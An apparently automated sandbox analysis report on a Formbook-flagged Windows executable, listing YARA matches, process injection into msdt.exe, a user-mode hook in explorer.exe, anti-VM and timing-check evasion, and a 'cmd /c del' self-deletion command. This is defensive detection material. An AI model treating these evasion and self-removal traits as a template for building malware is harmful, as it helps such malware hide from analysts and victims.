          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_004010309_2_00401030
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00402D889_2_00402D88
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00402D909_2_00402D90
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00409E409_2_00409E40
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00409E3B9_2_00409E3B
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_0041DFAF9_2_0041DFAF
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00402FB09_2_00402FB0
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00E35A639_2_00E35A63
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00E352479_2_00E35247
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05340D2014_2_05340D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05411D5514_2_05411D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05412D0714_2_05412D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_054125DD14_2_054125DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537258114_2_05372581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535D5E014_2_0535D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540D46614_2_0540D466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535841F14_2_0535841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0541DFCE14_2_0541DFCE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05411FF114_2_05411FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05366E3014_2_05366E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540D61614_2_0540D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05412EF714_2_05412EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536412014_2_05364120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534F90014_2_0534F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540100214_2_05401002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0541E82414_2_0541E824
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053720A014_2_053720A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535B09014_2_0535B090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_054128EC14_2_054128EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_054120A814_2_054120A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05412B2814_2_05412B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537EBB014_2_0537EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540DBD214_2_0540DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_054003DA14_2_054003DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_054122AE14_2_054122AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F32D9014_2_00F32D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F32D8814_2_00F32D88
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F39E4014_2_00F39E40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F39E3B14_2_00F39E3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F32FB014_2_00F32FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F4DFAF14_2_00F4DFAF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0534B150 appears 39 times
          Source: 86dXpRWnFG.exe, 00000000.00000002.736228559.000000000030C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVfgwhtwrcepk2.exel% vs 86dXpRWnFG.exe
          Source: 86dXpRWnFG.exe, 00000000.00000002.737993531.0000000002921000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClassLibrary3.dll< vs 86dXpRWnFG.exe
          Source: 86dXpRWnFG.exe, 00000000.00000002.749362534.0000000006F50000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameObowjsde.dll4 vs 86dXpRWnFG.exe
          Source: 86dXpRWnFG.exe, 00000000.00000002.751018297.0000000007090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs 86dXpRWnFG.exe
          Source: 86dXpRWnFG.exe, 00000009.00000000.735500288.0000000000F1C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVfgwhtwrcepk2.exel% vs 86dXpRWnFG.exe
          Source: 86dXpRWnFG.exe, 00000009.00000002.790974355.00000000035A0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs 86dXpRWnFG.exe
          Source: 86dXpRWnFG.exe, 00000009.00000002.785970586.0000000001A8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 86dXpRWnFG.exe
          Source: 86dXpRWnFG.exeBinary or memory string: OriginalFilenameVfgwhtwrcepk2.exel% vs 86dXpRWnFG.exe
          Source: 00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.785228330.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.785228330.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.914598348.0000000003820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.914598348.0000000003820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.738669459.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.738669459.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.86dXpRWnFG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.86dXpRWnFG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.86dXpRWnFG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.86dXpRWnFG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/2
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\86dXpRWnFG.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_01
          Source: 86dXpRWnFG.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 86dXpRWnFG.exeVirustotal: Detection: 32%
          Source: 86dXpRWnFG.exeReversingLabs: Detection: 10%
          Source: unknownProcess created: C:\Users\user\Desktop\86dXpRWnFG.exe 'C:\Users\user\Desktop\86dXpRWnFG.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\86dXpRWnFG.exe C:\Users\user\Desktop\86dXpRWnFG.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\86dXpRWnFG.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess created: C:\Users\user\Desktop\86dXpRWnFG.exe C:\Users\user\Desktop\86dXpRWnFG.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\86dXpRWnFG.exe'Jump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 86dXpRWnFG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 86dXpRWnFG.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.758018401.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: 86dXpRWnFG.exe, 00000009.00000002.790974355.00000000035A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 86dXpRWnFG.exe, 00000009.00000002.785970586.0000000001A8F000.00000040.00000001.sdmp, msdt.exe, 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 86dXpRWnFG.exe, 00000009.00000002.785970586.0000000001A8F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: 86dXpRWnFG.exe, 00000009.00000002.790974355.00000000035A0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.758018401.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_0041797C push ecx; retf 9_2_0041797F
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00417936 push esp; retf 9_2_00417937
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_0040E3E7 push ebp; iretd 9_2_0040E3E8
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00417C0D push ss; ret 9_2_00417C13
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_0041CEB5 push eax; ret 9_2_0041CF08
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_0041CF6C push eax; ret 9_2_0041CF72
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_0041CF02 push eax; ret 9_2_0041CF08
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_0041CF0B push eax; ret 9_2_0041CF72
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_0041D7C6 push cs; retf 9_2_0041D7C7
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_0041678C push 00000050h; retf 9_2_0041678F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0539D0D1 push ecx; ret 14_2_0539D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F4797C push ecx; retf 14_2_00F4797F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F47936 push esp; retf 14_2_00F47937
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F3E3E7 push ebp; iretd 14_2_00F3E3E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F47C0D push ss; ret 14_2_00F47C13
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F4CEB5 push eax; ret 14_2_00F4CF08
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F4D7C6 push cs; retf 14_2_00F4D7C7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F4678C push 00000050h; retf 14_2_00F4678F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F4CF6C push eax; ret 14_2_00F4CF72
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F4CF02 push eax; ret 14_2_00F4CF08
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F4CF0B push eax; ret 14_2_00F4CF72
          Source: 86dXpRWnFG.exe, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 86dXpRWnFG.exe, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 0.0.86dXpRWnFG.exe.220000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 0.0.86dXpRWnFG.exe.220000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 0.2.86dXpRWnFG.exe.220000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 0.2.86dXpRWnFG.exe.220000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 9.0.86dXpRWnFG.exe.e30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 9.0.86dXpRWnFG.exe.e30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 9.2.86dXpRWnFG.exe.e30000.1.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 9.2.86dXpRWnFG.exe.e30000.1.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE0
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 86dXpRWnFG.exe, 00000000.00000002.749362534.0000000006F50000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLHEADKCREATEOBJECT("WSCRIPT.SHELL").RUN """
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000F398E4 second address: 0000000000F398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000F39B5E second address: 0000000000F39B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00409A90 rdtsc 9_2_00409A90
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exe TID: 3984Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6360Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: explorer.exe, 0000000A.00000000.762827387.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.757122057.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: 86dXpRWnFG.exe, 00000000.00000002.749362534.0000000006F50000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000A.00000000.758744895.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.762827387.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000002.922688507.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
